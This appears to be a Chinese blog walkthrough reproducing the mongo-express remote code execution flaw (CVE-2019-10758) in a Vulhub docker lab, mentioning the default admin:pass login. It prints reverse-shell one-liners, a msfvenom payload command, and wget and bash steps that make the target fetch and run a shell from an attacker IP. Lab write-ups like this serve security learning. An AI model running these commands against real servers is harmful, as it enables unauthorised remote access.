四时宝库

程序员的知识宝库

学习Vulhub的mongo-express 远程代码执行漏洞(CVE-2019-10758)

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。[1]

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

  • docker-compose build //可选
  • docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

  • docker-compose down
  • docker system prune -a -f //可选

简单访问一下,说明mongo-express 远程代码执行漏洞(CVE-2019-10758)环境搭建成功了


反弹shell无效的语句

  • bash -c 'bash -i >& /dev/tcp/174.137.58.6/8888 0>&1'
  • bash -c $@|bash 0 echo bash -i >&/dev/tcp/174.137.58.6/8888 0>&1

只能靠文件上传了,先准备好反弹shell文件

msfvenom -p cmd/unix/reverse_python LHOST=174.137.58.6 LPORT=8888 -f raw > ailx10.py 

通过BurpSuite构造请求,让靶机主动下载反弹shell文件

wget http://174.137.58.6:7777/ailx10.py -O /tmp/shell

再次通过BurpSuite构造请求,让靶机主动执行反弹shell

bash /tmp/shell

见证奇迹的时刻到了,反弹shell成功

参考

  1. ^mongo-express 远程代码执行漏洞(CVE-2019-10758) https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/

发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言
    友情链接